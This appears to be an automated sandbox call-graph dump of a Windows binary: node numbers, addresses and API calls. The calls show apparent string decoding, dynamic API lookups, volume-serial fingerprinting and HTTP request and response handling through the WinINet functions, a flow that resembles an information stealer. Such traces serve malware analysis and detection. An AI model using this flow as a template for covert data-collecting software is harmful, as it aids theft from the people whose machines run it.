lstrcpy 58662->58663 58664 4134f3 58663->58664 58665 416fb0 4 API calls 58664->58665 58666 413505 58665->58666 58667 416ea0 lstrcpy 58666->58667 58668 41350e 58667->58668 58669 416fb0 4 API calls 58668->58669 58670 413527 58669->58670 58671 416ea0 lstrcpy 58670->58671 58672 413530 58671->58672 58673 416fb0 4 API calls 58672->58673 58674 41354a 58673->58674 58675 416ea0 lstrcpy 58674->58675 58676 413553 58675->58676 58677 416fb0 4 API calls 58676->58677 58678 41356c 58677->58678 58679 416ea0 lstrcpy 58678->58679 58680 413575 58679->58680 58681 416fb0 4 API calls 58680->58681 58682 41358f 58681->58682 58683 416ea0 lstrcpy 58682->58683 58684 413598 58683->58684 58685 416fb0 4 API calls 58684->58685 58686 4135b3 58685->58686 58687 416ea0 lstrcpy 58686->58687 58688 4135bc 58687->58688 58689 416da0 lstrcpy 58688->58689 58690 4135d0 58689->58690 58690->58501 58692 416e12 58691->58692 58692->58504 58694 416e3f 58693->58694 58695 412be0 58694->58695 58696 416e7b lstrcpy 58694->58696 58695->58514 58696->58695 58698 4043b0 2 API calls 58697->58698 58699 4025a4 58698->58699 58700 4043b0 2 API calls 58699->58700 58701 4025bd 58700->58701 58702 4043b0 2 API calls 58701->58702 58703 4025d6 58702->58703 58704 4043b0 2 API calls 58703->58704 58705 4025ef 58704->58705 58706 4043b0 2 API calls 58705->58706 58707 402608 58706->58707 58708 4043b0 2 API calls 58707->58708 58709 402621 58708->58709 58710 4043b0 2 API calls 58709->58710 58711 40263a 58710->58711 58712 4043b0 2 API calls 58711->58712 58713 402653 58712->58713 58714 4043b0 2 API calls 58713->58714 58715 40266c 58714->58715 58716 4043b0 2 API calls 58715->58716 58717 402685 58716->58717 58718 4043b0 2 API calls 58717->58718 58719 40269e 58718->58719 58720 4043b0 2 API calls 58719->58720 58721 4026b7 58720->58721 58722 4043b0 2 API calls 58721->58722 58723 4026d0 58722->58723 58724 4043b0 2 API calls 58723->58724 58725 4026e9 58724->58725 58726 4043b0 2 API calls 58725->58726 58727 402702 58726->58727 58728 4043b0 2 API calls 58727->58728 58729 40271b 58728->58729 58730 4043b0 2 API calls 58729->58730 58731 402734 58730->58731 58732 4043b0 2 API calls 58731->58732 58733 40274d 58732->58733 58734 4043b0 2 API calls 58733->58734 58735 402766 58734->58735 58736 4043b0 2 API calls 58735->58736 58737 40277f 58736->58737 58738 4043b0 2 API calls 58737->58738 58739 402798 58738->58739 58740 4043b0 2 API calls 58739->58740 58741 4027b1 58740->58741 58742 4043b0 2 API calls 58741->58742 58743 4027ca 58742->58743 58744 4043b0 2 API calls 58743->58744 58745 4027e3 58744->58745 58746 4043b0 2 API calls 58745->58746 58747 4027fc 58746->58747 58748 4043b0 2 API calls 58747->58748 58749 402815 58748->58749 58750 4043b0 2 API calls 58749->58750 58751 40282e 58750->58751 58752 4043b0 2 API calls 58751->58752 58753 402847 58752->58753 58754 4043b0 2 API calls 58753->58754 58755 402860 58754->58755 58756 4043b0 2 API calls 58755->58756 58757 402879 58756->58757 58758 4043b0 2 API calls 58757->58758 58759 402892 58758->58759 58760 4043b0 2 API calls 58759->58760 58761 4028ab 58760->58761 58762 4043b0 2 API calls 58761->58762 58763 4028c4 58762->58763 58764 4043b0 2 API calls 58763->58764 58765 4028dd 58764->58765 58766 4043b0 2 API calls 58765->58766 58767 4028f6 58766->58767 58768 4043b0 2 API calls 58767->58768 58769 40290f 58768->58769 58770 4043b0 2 API calls 58769->58770 58771 402928 58770->58771 58772 4043b0 2 API calls 58771->58772 58773 402941 58772->58773 58774 4043b0 2 API calls 58773->58774 58775 40295a 58774->58775 58776 4043b0 2 API calls 58775->58776 58777 402973 58776->58777 58778 4043b0 2 API calls 58777->58778 58779 40298c 58778->58779 58780 4043b0 2 API calls 58779->58780 58781 4029a5 58780->58781 58782 4043b0 2 API calls 58781->58782 58783 4029be 58782->58783 58784 4043b0 2 API calls 58783->58784 58785 4029d7 58784->58785 58786 4043b0 2 API calls 58785->58786 58787 4029f0 58786->58787 58788 4043b0 2 API calls 58787->58788 58789 402a09 58788->58789 58790 4043b0 2 API calls 58789->58790 58791 402a22 58790->58791 58792 4043b0 2 API calls 58791->58792 58793 402a3b 58792->58793 58794 4043b0 2 API calls 58793->58794 58795 402a54 58794->58795 58796 4043b0 2 API calls 58795->58796 58797 402a6d 58796->58797 58798 4043b0 2 API calls 58797->58798 58799 402a86 58798->58799 58800 4043b0 2 API calls 58799->58800 58801 402a9f 58800->58801 58802 4043b0 2 API calls 58801->58802 58803 402ab8 58802->58803 58804 4043b0 2 API calls 58803->58804 58805 402ad1 58804->58805 58806 4043b0 2 API calls 58805->58806 58807 402aea 58806->58807 58808 4043b0 2 API calls 58807->58808 58809 402b03 58808->58809 58810 4043b0 2 API calls 58809->58810 58811 402b1c 58810->58811 58812 4043b0 2 API calls 58811->58812 58813 402b35 58812->58813 58814 4043b0 2 API calls 58813->58814 58815 402b4e 58814->58815 58816 4043b0 2 API calls 58815->58816 58817 402b67 58816->58817 58818 4043b0 2 API calls 58817->58818 58819 402b80 58818->58819 58820 4043b0 2 API calls 58819->58820 58821 402b99 58820->58821 58822 4043b0 2 API calls 58821->58822 58823 402bb2 58822->58823 58824 4043b0 2 API calls 58823->58824 58825 402bcb 58824->58825 58826 4043b0 2 API calls 58825->58826 58827 402be4 58826->58827 58828 4043b0 2 API calls 58827->58828 58829 402bfd 58828->58829 58830 4043b0 2 API calls 58829->58830 58831 402c16 58830->58831 58832 4043b0 2 API calls 58831->58832 58833 402c2f 58832->58833 58834 4043b0 2 API calls 58833->58834 58835 402c48 58834->58835 58836 4043b0 2 API calls 58835->58836 58837 402c61 58836->58837 58838 4043b0 2 API calls 58837->58838 58839 402c7a 58838->58839 58840 4043b0 2 API calls 58839->58840 58841 402c93 58840->58841 58842 4043b0 2 API calls 58841->58842 58843 402cac 58842->58843 58844 4043b0 2 API calls 58843->58844 58845 402cc5 58844->58845 58846 4043b0 2 API calls 58845->58846 58847 402cde 58846->58847 58848 4043b0 2 API calls 58847->58848 58849 402cf7 58848->58849 58850 4043b0 2 API calls 58849->58850 58851 402d10 58850->58851 58852 4043b0 2 API calls 58851->58852 58853 402d29 58852->58853 58854 4043b0 2 API calls 58853->58854 58855 402d42 58854->58855 58856 4043b0 2 API calls 58855->58856 58857 402d5b 58856->58857 58858 4043b0 2 API calls 58857->58858 58859 402d74 58858->58859 58860 4043b0 2 API calls 58859->58860 58861 402d8d 58860->58861 58862 4043b0 2 API calls 58861->58862 58863 402da6 58862->58863 58864 4043b0 2 API calls 58863->58864 58865 402dbf 58864->58865 58866 4043b0 2 API calls 58865->58866 58867 402dd8 58866->58867 58868 4043b0 2 API calls 58867->58868 58869 402df1 58868->58869 58870 4043b0 2 API calls 58869->58870 58871 402e0a 58870->58871 58872 4043b0 2 API calls 58871->58872 58873 402e23 58872->58873 58874 4043b0 2 API calls 58873->58874 58875 402e3c 58874->58875 58876 4043b0 2 API calls 58875->58876 58877 402e55 58876->58877 58878 4043b0 2 API calls 58877->58878 58879 402e6e 58878->58879 58880 4043b0 2 API calls 58879->58880 58881 402e87 58880->58881 58882 4043b0 2 API calls 58881->58882 58883 402ea0 58882->58883 58884 4043b0 2 API calls 58883->58884 58885 402eb9 58884->58885 58886 4043b0 2 API calls 58885->58886 58887 402ed2 58886->58887 58888 4043b0 2 API calls 58887->58888 58889 402eeb 58888->58889 58890 4043b0 2 API calls 58889->58890 58891 402f04 58890->58891 58892 4043b0 2 API calls 58891->58892 58893 402f1d 58892->58893 58894 4043b0 2 API calls 58893->58894 58895 402f36 58894->58895 58896 4043b0 2 API calls 58895->58896 58897 402f4f 58896->58897 58898 4043b0 2 API calls 58897->58898 58899 402f68 58898->58899 58900 4043b0 2 API calls 58899->58900 58901 402f81 58900->58901 58902 4043b0 2 API calls 58901->58902 58903 402f9a 58902->58903 58904 4043b0 2 API calls 58903->58904 58905 402fb3 58904->58905 58906 4043b0 2 API calls 58905->58906 58907 402fcc 58906->58907 58908 4043b0 2 API calls 58907->58908 58909 402fe5 58908->58909 58910 4043b0 2 API calls 58909->58910 58911 402ffe 58910->58911 58912 4043b0 2 API calls 58911->58912 58913 403017 58912->58913 58914 4043b0 2 API calls 58913->58914 58915 403030 58914->58915 58916 4043b0 2 API calls 58915->58916 58917 403049 58916->58917 58918 4043b0 2 API calls 58917->58918 58919 403062 58918->58919 58920 4043b0 2 API calls 58919->58920 58921 40307b 58920->58921 58922 4043b0 2 API calls 58921->58922 58923 403094 58922->58923 58924 4043b0 2 API calls 58923->58924 58925 4030ad 58924->58925 58926 4043b0 2 API calls 58925->58926 58927 4030c6 58926->58927 58928 4043b0 2 API calls 58927->58928 58929 4030df 58928->58929 58930 4043b0 2 API calls 58929->58930 58931 4030f8 58930->58931 58932 4043b0 2 API calls 58931->58932 58933 403111 58932->58933 58934 4043b0 2 API calls 58933->58934 58935 40312a 58934->58935 58936 4043b0 2 API calls 58935->58936 58937 403143 58936->58937 58938 4043b0 2 API calls 58937->58938 58939 40315c 58938->58939 58940 4043b0 2 API calls 58939->58940 58941 403175 58940->58941 58942 4043b0 2 API calls 58941->58942 58943 40318e 58942->58943 58944 4043b0 2 API calls 58943->58944 58945 4031a7 58944->58945 58946 4043b0 2 API calls 58945->58946 58947 4031c0 58946->58947 58948 4043b0 2 API calls 58947->58948 58949 4031d9 58948->58949 58950 4043b0 2 API calls 58949->58950 58951 4031f2 58950->58951 58952 4043b0 2 API calls 58951->58952 58953 40320b 58952->58953 58954 4043b0 2 API calls 58953->58954 58955 403224 58954->58955 58956 4043b0 2 API calls 58955->58956 58957 40323d 58956->58957 58958 4043b0 2 API calls 58957->58958 58959 403256 58958->58959 58960 4043b0 2 API calls 58959->58960 58961 40326f 58960->58961 58962 4043b0 2 API calls 58961->58962 58963 403288 58962->58963 58964 4043b0 2 API calls 58963->58964 58965 4032a1 58964->58965 58966 4043b0 2 API calls 58965->58966 58967 4032ba 58966->58967 58968 4043b0 2 API calls 58967->58968 58969 4032d3 58968->58969 58970 4043b0 2 API calls 58969->58970 58971 4032ec 58970->58971 58972 4043b0 2 API calls 58971->58972 58973 403305 58972->58973 58974 4043b0 2 API calls 58973->58974 58975 40331e 58974->58975 58976 4043b0 2 API calls 58975->58976 58977 403337 58976->58977 58978 4043b0 2 API calls 58977->58978 58979 403350 58978->58979 58980 4043b0 2 API calls 58979->58980 58981 403369 58980->58981 58982 4043b0 2 API calls 58981->58982 58983 403382 58982->58983 58984 4043b0 2 API calls 58983->58984 58985 40339b 58984->58985 58986 4043b0 2 API calls 58985->58986 58987 4033b4 58986->58987 58988 4043b0 2 API calls 58987->58988 58989 4033cd 58988->58989 58990 4043b0 2 API calls 58989->58990 58991 4033e6 58990->58991 58992 4043b0 2 API calls 58991->58992 58993 4033ff 58992->58993 58994 4043b0 2 API calls 58993->58994 58995 403418 58994->58995 58996 4043b0 2 API calls 58995->58996 58997 403431 58996->58997 58998 4043b0 2 API calls 58997->58998 58999 40344a 58998->58999 59000 4043b0 2 API calls 58999->59000 59001 403463 59000->59001 59002 4043b0 2 API calls 59001->59002 59003 40347c 59002->59003 59004 4043b0 2 API calls 59003->59004 59005 403495 59004->59005 59006 4043b0 2 API calls 59005->59006 59007 4034ae 59006->59007 59008 4043b0 2 API calls 59007->59008 59009 4034c7 59008->59009 59010 4043b0 2 API calls 59009->59010 59011 4034e0 59010->59011 59012 4043b0 2 API calls 59011->59012 59013 4034f9 59012->59013 59014 4043b0 2 API calls 59013->59014 59015 403512 59014->59015 59016 4043b0 2 API calls 59015->59016 59017 40352b 59016->59017 59018 4043b0 2 API calls 59017->59018 59019 403544 59018->59019 59020 4043b0 2 API calls 59019->59020 59021 40355d 59020->59021 59022 4043b0 2 API calls 59021->59022 59023 403576 59022->59023 59024 4043b0 2 API calls 59023->59024 59025 40358f 59024->59025 59026 4043b0 2 API calls 59025->59026 59027 4035a8 59026->59027 59028 4043b0 2 API calls 59027->59028 59029 4035c1 59028->59029 59030 4043b0 2 API calls 59029->59030 59031 4035da 59030->59031 59032 4043b0 2 API calls 59031->59032 59033 4035f3 59032->59033 59034 4043b0 2 API calls 59033->59034 59035 40360c 59034->59035 59036 4043b0 2 API calls 59035->59036 59037 403625 59036->59037 59038 4043b0 2 API calls 59037->59038 59039 40363e 59038->59039 59040 4043b0 2 API calls 59039->59040 59041 403657 59040->59041 59042 4043b0 2 API calls 59041->59042 59043 403670 59042->59043 59044 4043b0 2 API calls 59043->59044 59045 403689 59044->59045 59046 4043b0 2 API calls 59045->59046 59047 4036a2 59046->59047 59048 4043b0 2 API calls 59047->59048 59049 4036bb 59048->59049 59050 4043b0 2 API calls 59049->59050 59051 4036d4 59050->59051 59052 4043b0 2 API calls 59051->59052 59053 4036ed 59052->59053 59054 4043b0 2 API calls 59053->59054 59055 403706 59054->59055 59056 4043b0 2 API calls 59055->59056 59057 40371f 59056->59057 59058 4043b0 2 API calls 59057->59058 59059 403738 59058->59059 59060 4043b0 2 API calls 59059->59060 59061 403751 59060->59061 59062 4043b0 2 API calls 59061->59062 59063 40376a 59062->59063 59064 4043b0 2 API calls 59063->59064 59065 403783 59064->59065 59066 4043b0 2 API calls 59065->59066 59067 40379c 59066->59067 59068 4043b0 2 API calls 59067->59068 59069 4037b5 59068->59069 59070 4043b0 2 API calls 59069->59070 59071 4037ce 59070->59071 59072 4043b0 2 API calls 59071->59072 59073 4037e7 59072->59073 59074 4043b0 2 API calls 59073->59074 59075 403800 59074->59075 59076 4043b0 2 API calls 59075->59076 59077 403819 59076->59077 59078 4043b0 2 API calls 59077->59078 59079 403832 59078->59079 59080 4043b0 2 API calls 59079->59080 59081 40384b 59080->59081 59082 4043b0 2 API calls 59081->59082 59083 403864 59082->59083 59084 4043b0 2 API calls 59083->59084 59085 40387d 59084->59085 59086 4043b0 2 API calls 59085->59086 59087 403896 59086->59087 59088 4043b0 2 API calls 59087->59088 59089 4038af 59088->59089 59090 4043b0 2 API calls 59089->59090 59091 4038c8 59090->59091 59092 4043b0 2 API calls 59091->59092 59093 4038e1 59092->59093 59094 4043b0 2 API calls 59093->59094 59095 4038fa 59094->59095 59096 4043b0 2 API calls 59095->59096 59097 403913 59096->59097 59098 4043b0 2 API calls 59097->59098 59099 40392c 59098->59099 59100 4043b0 2 API calls 59099->59100 59101 403945 59100->59101 59102 4043b0 2 API calls 59101->59102 59103 40395e 59102->59103 59104 4043b0 2 API calls 59103->59104 59105 403977 59104->59105 59106 4043b0 2 API calls 59105->59106 59107 403990 59106->59107 59108 4043b0 2 API calls 59107->59108 59109 4039a9 59108->59109 59110 4043b0 2 API calls 59109->59110 59111 4039c2 59110->59111 59112 4043b0 2 API calls 59111->59112 59113 4039db 59112->59113 59114 4043b0 2 API calls 59113->59114 59115 4039f4 59114->59115 59116 4043b0 2 API calls 59115->59116 59117 403a0d 59116->59117 59118 4043b0 2 API calls 59117->59118 59119 403a26 59118->59119 59120 4043b0 2 API calls 59119->59120 59121 403a3f 59120->59121 59122 4043b0 2 API calls 59121->59122 59123 403a58 59122->59123 59124 4043b0 2 API calls 59123->59124 59125 403a71 59124->59125 59126 4043b0 2 API calls 59125->59126 59127 403a8a 59126->59127 59128 4043b0 2 API calls 59127->59128 59129 403aa3 59128->59129 59130 4043b0 2 API calls 59129->59130 59131 403abc 59130->59131 59132 4043b0 2 API calls 59131->59132 59133 403ad5 59132->59133 59134 4043b0 2 API calls 59133->59134 59135 403aee 59134->59135 59136 4043b0 2 API calls 59135->59136 59137 403b07 59136->59137 59138 4043b0 2 API calls 59137->59138 59139 403b20 59138->59139 59140 4043b0 2 API calls 59139->59140 59141 403b39 59140->59141 59142 4043b0 2 API calls 59141->59142 59143 403b52 59142->59143 59144 4043b0 2 API calls 59143->59144 59145 403b6b 59144->59145 59146 4043b0 2 API calls 59145->59146 59147 403b84 59146->59147 59148 4043b0 2 API calls 59147->59148 59149 403b9d 59148->59149 59150 4043b0 2 API calls 59149->59150 59151 403bb6 59150->59151 59152 4043b0 2 API calls 59151->59152 59153 403bcf 59152->59153 59154 4043b0 2 API calls 59153->59154 59155 403be8 59154->59155 59156 4043b0 2 API calls 59155->59156 59157 403c01 59156->59157 59158 4043b0 2 API calls 59157->59158 59159 403c1a 59158->59159 59160 4043b0 2 API calls 59159->59160 59161 403c33 59160->59161 59162 4043b0 2 API calls 59161->59162 59163 403c4c 59162->59163 59164 4043b0 2 API calls 59163->59164 59165 403c65 59164->59165 59166 4043b0 2 API calls 59165->59166 59167 403c7e 59166->59167 59168 4043b0 2 API calls 59167->59168 59169 403c97 59168->59169 59170 4043b0 2 API calls 59169->59170 59171 403cb0 59170->59171 59172 4043b0 2 API calls 59171->59172 59173 403cc9 59172->59173 59174 4043b0 2 API calls 59173->59174 59175 403ce2 59174->59175 59176 4043b0 2 API calls 59175->59176 59177 403cfb 59176->59177 59178 4043b0 2 API calls 59177->59178 59179 403d14 59178->59179 59180 4043b0 2 API calls 59179->59180 59181 403d2d 59180->59181 59182 4043b0 2 API calls 59181->59182 59183 403d46 59182->59183 59184 4043b0 2 API calls 59183->59184 59185 403d5f 59184->59185 59186 4043b0 2 API calls 59185->59186 59187 403d78 59186->59187 59188 4043b0 2 API calls 59187->59188 59189 403d91 59188->59189 59190 4043b0 2 API calls 59189->59190 59191 403daa 59190->59191 59192 4043b0 2 API calls 59191->59192 59193 403dc3 59192->59193 59194 4043b0 2 API calls 59193->59194 59195 403ddc 59194->59195 59196 4043b0 2 API calls 59195->59196 59197 403df5 59196->59197 59198 4043b0 2 API calls 59197->59198 59199 403e0e 59198->59199 59200 4043b0 2 API calls 59199->59200 59201 403e27 59200->59201 59202 4043b0 2 API calls 59201->59202 59203 403e40 59202->59203 59204 4043b0 2 API calls 59203->59204 59205 403e59 59204->59205 59206 4043b0 2 API calls 59205->59206 59207 403e72 59206->59207 59208 4043b0 2 API calls 59207->59208 59209 403e8b 59208->59209 59210 4043b0 2 API calls 59209->59210 59211 403ea4 59210->59211 59212 4043b0 2 API calls 59211->59212 59213 403ebd 59212->59213 59214 4043b0 2 API calls 59213->59214 59215 403ed6 59214->59215 59216 4043b0 2 API calls 59215->59216 59217 403eef 59216->59217 59218 4043b0 2 API calls 59217->59218 59219 403f08 59218->59219 59220 4043b0 2 API calls 59219->59220 59221 403f21 59220->59221 59222 4043b0 2 API calls 59221->59222 59223 403f3a 59222->59223 59224 4043b0 2 API calls 59223->59224 59225 403f53 59224->59225 59226 4043b0 2 API calls 59225->59226 59227 403f6c 59226->59227 59228 4043b0 2 API calls 59227->59228 59229 403f85 59228->59229 59230 4043b0 2 API calls 59229->59230 59231 403f9e 59230->59231 59232 4043b0 2 API calls 59231->59232 59233 403fb7 59232->59233 59234 4043b0 2 API calls 59233->59234 59235 403fd0 59234->59235 59236 4043b0 2 API calls 59235->59236 59237 403fe9 59236->59237 59238 4043b0 2 API calls 59237->59238 59239 404002 59238->59239 59240 4043b0 2 API calls 59239->59240 59241 40401b 59240->59241 59242 4043b0 2 API calls 59241->59242 59243 404034 59242->59243 59244 4043b0 2 API calls 59243->59244 59245 40404d 59244->59245 59246 4043b0 2 API calls 59245->59246 59247 404066 59246->59247 59248 4043b0 2 API calls 59247->59248 59249 40407f 59248->59249 59250 4043b0 2 API calls 59249->59250 59251 404098 59250->59251 59252 4043b0 2 API calls 59251->59252 59253 4040b1 59252->59253 59254 4043b0 2 API calls 59253->59254 59255 4040ca 59254->59255 59256 4043b0 2 API calls 59255->59256 59257 4040e3 59256->59257 59258 4043b0 2 API calls 59257->59258 59259 4040fc 59258->59259 59260 4043b0 2 API calls 59259->59260 59261 404115 59260->59261 59262 4043b0 2 API calls 59261->59262 59263 40412e 59262->59263 59264 4043b0 2 API calls 59263->59264 59265 404147 59264->59265 59266 4043b0 2 API calls 59265->59266 59267 404160 59266->59267 59268 4043b0 2 API calls 59267->59268 59269 404179 59268->59269 59270 4043b0 2 API calls 59269->59270 59271 404192 59270->59271 59272 4043b0 2 API calls 59271->59272 59273 4041ab 59272->59273 59274 4043b0 2 API calls 59273->59274 59275 4041c4 59274->59275 59276 4043b0 2 API calls 59275->59276 59277 4041dd 59276->59277 59278 4043b0 2 API calls 59277->59278 59279 4041f6 59278->59279 59280 4043b0 2 API calls 59279->59280 59281 40420f 59280->59281 59282 4043b0 2 API calls 59281->59282 59283 404228 59282->59283 59284 4043b0 2 API calls 59283->59284 59285 404241 59284->59285 59286 4043b0 2 API calls 59285->59286 59287 40425a 59286->59287 59288 4043b0 2 API calls 59287->59288 59289 404273 59288->59289 59290 4043b0 2 API calls 59289->59290 59291 40428c 59290->59291 59292 4043b0 2 API calls 59291->59292 59293 4042a5 59292->59293 59294 4043b0 2 API calls 59293->59294 59295 4042be 59294->59295 59296 4043b0 2 API calls 59295->59296 59297 4042d7 59296->59297 59298 4043b0 2 API calls 59297->59298 59299 4042f0 59298->59299 59300 4043b0 2 API calls 59299->59300 59301 404309 59300->59301 59302 4043b0 2 API calls 59301->59302 59303 404322 59302->59303 59304 4043b0 2 API calls 59303->59304 59305 40433b 59304->59305 59306 4043b0 2 API calls 59305->59306 59307 404354 59306->59307 59308 4043b0 2 API calls 59307->59308 59309 40436d 59308->59309 59310 4043b0 2 API calls 59309->59310 59311 404386 59310->59311 59312 4043b0 2 API calls 59311->59312 59313 40439f 59312->59313 59314 416240 59313->59314 59315 416250 43 API calls 59314->59315 59316 416666 8 API calls 59314->59316 59315->59316 59317 416776 59316->59317 59318 4166fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59316->59318 59319 416783 8 API calls 59317->59319 59320 416846 59317->59320 59318->59317 59319->59320 59321 4168c8 59320->59321 59322 41684f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59320->59322 59323 4168d5 6 API calls 59321->59323 59324 416967 59321->59324 59322->59321 59323->59324 59325 416974 9 API calls 59324->59325 59326 416a4f 59324->59326 59325->59326 59327 416ad2 59326->59327 59328 416a58 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59326->59328 59329 416adb GetProcAddress GetProcAddress 59327->59329 59330 416b0c 59327->59330 59328->59327 59329->59330 59331 416b45 59330->59331 59332 416b15 GetProcAddress GetProcAddress 59330->59332 59333 416b52 8 API calls 59331->59333 59334 416c15 59331->59334 59332->59331 59333->59334 59335 416c7f 59334->59335 59336 416c1e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59334->59336 59337 416ca1 59335->59337 59338 416c88 GetProcAddress 59335->59338 59336->59335 59339 412cc6 59337->59339 59340 416caa GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59337->59340 59338->59337 59339->58524 59340->59339 59342 4141f0 GetVolumeInformationA 59341->59342 59343 4141e9 59341->59343 59344 41422e 59342->59344 59343->59342 59345 414299 GetProcessHeap HeapAlloc 59344->59345 59346 4142c5 wsprintfA 59345->59346 59347 4142b6 59345->59347 59349 416d40 lstrcpy 59346->59349 59348 416d40 lstrcpy 59347->59348 59350 412d94 59348->59350 59349->59350 59350->58544 59352 416da0 lstrcpy 59351->59352 59353 404559 59352->59353 60371 404470 59353->60371 59355 404565 59356 416d40 lstrcpy 59355->59356 59357 404597 59356->59357 59358 416d40 lstrcpy 59357->59358 59359 4045a4 59358->59359 59360 416d40 lstrcpy 59359->59360 59361 4045b1 59360->59361 59362 416d40 lstrcpy 59361->59362 59363 4045be 59362->59363 59364 416d40 lstrcpy 59363->59364 59365 4045cb InternetOpenA StrCmpCA 59364->59365 59366 404604 59365->59366 59367 404b8b InternetCloseHandle 59366->59367 60383 415260 59366->60383 59369 404ba8 59367->59369 60398 4094a0 CryptStringToBinaryA 59369->60398 59370 404623 60391 416f20 59370->60391 59374 404636 59375 416ea0 lstrcpy 59374->59375 59380 40463f 59375->59380 59376 416e20 2 API calls 59377 404bc5 59376->59377 59378 416fb0 4 API calls 59377->59378 59381 404bdb 59378->59381 59379 404be7 moneypunct 59383 416da0 lstrcpy 59379->59383 59384 416fb0 4 API calls 59380->59384 59382 416ea0 lstrcpy 59381->59382 59382->59379 59396 404c17 59383->59396 59385 404669 59384->59385 59386 416ea0 lstrcpy 59385->59386 59387 404672 59386->59387 59388 416fb0 4 API calls 59387->59388 59389 404691 59388->59389 59390 416ea0 lstrcpy 59389->59390 59391 40469a 59390->59391 59392 416f20 3 API calls 59391->59392 59393 4046b8 59392->59393 59394 416ea0 lstrcpy 59393->59394 59395 4046c1 59394->59395 59397 416fb0 4 API calls 59395->59397 59396->58547 59398 4046e0 59397->59398 59399 416ea0 lstrcpy 59398->59399 59400 4046e9 59399->59400 59401 416fb0 4 API calls 59400->59401 59402 404708 59401->59402 59403 416ea0 lstrcpy 59402->59403 59404 404711 59403->59404 59405 416fb0 4 API calls 59404->59405 59406 40473d 59405->59406 59407 416f20 3 API calls 59406->59407 59408 404744 59407->59408 59409 416ea0 lstrcpy 59408->59409 59410 40474d 59409->59410 59411 404763 InternetConnectA 59410->59411 59411->59367 59412 404793 HttpOpenRequestA 59411->59412 59414 4047e8 59412->59414 59415 404b7e InternetCloseHandle 59412->59415 59416 416fb0 4 API calls 59414->59416 59415->59367 59417 4047fc 59416->59417 59418 416ea0 lstrcpy 59417->59418 59419 404805 59418->59419 59420 416f20 3 API calls 59419->59420 59421 404823 59420->59421 59422 416ea0 lstrcpy 59421->59422 59423 40482c 59422->59423 59424 416fb0 4 API calls 59423->59424 59425 40484b 59424->59425 59426 416ea0 lstrcpy 59425->59426 59427 404854 59426->59427 59428 416fb0 4 API calls 59427->59428 59429 404875 59428->59429 59430 416ea0 lstrcpy 59429->59430 59431 40487e 59430->59431 59432 416fb0 4 API calls 59431->59432 59433 40489e 59432->59433 59434 416ea0 lstrcpy 59433->59434 59435 4048a7 59434->59435 59436 416fb0 4 API calls 59435->59436 59437 4048c6 59436->59437 59438 416ea0 lstrcpy 59437->59438 59439 4048cf 59438->59439 59440 416f20 3 API calls 59439->59440 59441 4048ed 59440->59441 59442 416ea0 lstrcpy 59441->59442 59443 4048f6 59442->59443 59444 416fb0 4 API calls 59443->59444 59445 404915 59444->59445 59446 416ea0 lstrcpy 59445->59446 59447 40491e 59446->59447 59448 416fb0 4 API calls 59447->59448 59449 40493d 59448->59449 59450 416ea0 lstrcpy 59449->59450 59451 404946 59450->59451 59452 416f20 3 API calls 59451->59452 59453 404964 59452->59453 59454 416ea0 lstrcpy 59453->59454 59455 40496d 59454->59455 59456 416fb0 4 API calls 59455->59456 59457 40498c 59456->59457 59458 416ea0 lstrcpy 59457->59458 59459 404995 59458->59459 59460 416fb0 4 API calls 59459->59460 59461 4049b6 59460->59461 59462 416ea0 lstrcpy 59461->59462 59463 4049bf 59462->59463 59464 416fb0 4 API calls 59463->59464 59465 4049df 59464->59465 59466 416ea0 lstrcpy 59465->59466 59467 4049e8 59466->59467 59468 416fb0 4 API calls 59467->59468 59469 404a07 59468->59469 59470 416ea0 lstrcpy 59469->59470 59471 404a10 59470->59471 59472 416f20 3 API calls 59471->59472 59473 404a2e 59472->59473 59474 416ea0 lstrcpy 59473->59474 59475 404a37 59474->59475 59476 416d40 lstrcpy 59475->59476 59477 404a52 59476->59477 59478 416f20 3 API calls 59477->59478 59479 404a73 59478->59479 59480 416f20 3 API calls 59479->59480 59481 404a7a 59480->59481 59482 416ea0 lstrcpy 59481->59482 59483 404a86 59482->59483 59484 404aa7 lstrlen 59483->59484 59485 404aba 59484->59485 59486 404ac3 lstrlen 59485->59486 60397 4170d0 59486->60397 59488 404ad3 HttpSendRequestA 59489 404af2 InternetReadFile 59488->59489 59490 404b27 InternetCloseHandle 59489->59490 59495 404b1e 59489->59495 59493 416e00 59490->59493 59492 416fb0 4 API calls 59492->59495 59493->59415 59494 416ea0 lstrcpy 59494->59495 59495->59489 59495->59490 59495->59492 59495->59494 60407 4170d0 59496->60407 59498 40fb04 StrCmpCA 59499 40fb17 59498->59499 59500 40fb0f ExitProcess 59498->59500 59501 40fb27 strtok_s 59499->59501 59504 40fb34 59501->59504 59502 40fccc 59502->58549 59503 40fca8 strtok_s 59503->59504 59504->59502 59504->59503 59505 40fc8b StrCmpCA 59504->59505 59506 40fc6c StrCmpCA 59504->59506 59507 40fb9d StrCmpCA 59504->59507 59508 40fbed StrCmpCA 59504->59508 59509 40fc4d StrCmpCA 59504->59509 59510 40fc2e StrCmpCA 59504->59510 59511 40fbbf StrCmpCA 59504->59511 59512 40fc0f StrCmpCA 59504->59512 59513 416e20 lstrlen lstrcpy 59504->59513 59505->59503 59505->59504 59506->59504 59507->59504 59508->59504 59509->59504 59510->59504 59511->59504 59512->59504 59513->59504 59515 416da0 lstrcpy 59514->59515 59516 401513 59515->59516 59517 416da0 lstrcpy 59516->59517 59518 401525 59517->59518 59519 416da0 lstrcpy 59518->59519 59520 401537 59519->59520 59521 416da0 lstrcpy 59520->59521 59522 401549 59521->59522 59523 405610 59522->59523 59524 416da0 lstrcpy 59523->59524 59525 405629 59524->59525 59526 404470 3 API calls 59525->59526 59527 405635 59526->59527 59528 416d40 lstrcpy 59527->59528 59529 40566a 59528->59529 59530 416d40 lstrcpy 59529->59530 59531 405677 59530->59531 59532 416d40 lstrcpy 59531->59532 59533 405684 59532->59533 59534 416d40 lstrcpy 59533->59534 59535 405691 59534->59535 59536 416d40 lstrcpy 59535->59536 59537 40569e InternetOpenA StrCmpCA 59536->59537 59538 4056cd 59537->59538 59539 405c70 InternetCloseHandle 59538->59539 59541 415260 3 API calls 59538->59541 59540 405c8d 59539->59540 59543 4094a0 4 API calls 59540->59543 59542 4056ec 59541->59542 59544 416f20 3 API calls 59542->59544 59545 405c93 59543->59545 59546 4056ff 59544->59546 59548 416e20 2 API calls 59545->59548 59550 405ccc moneypunct 59545->59550 59547 416ea0 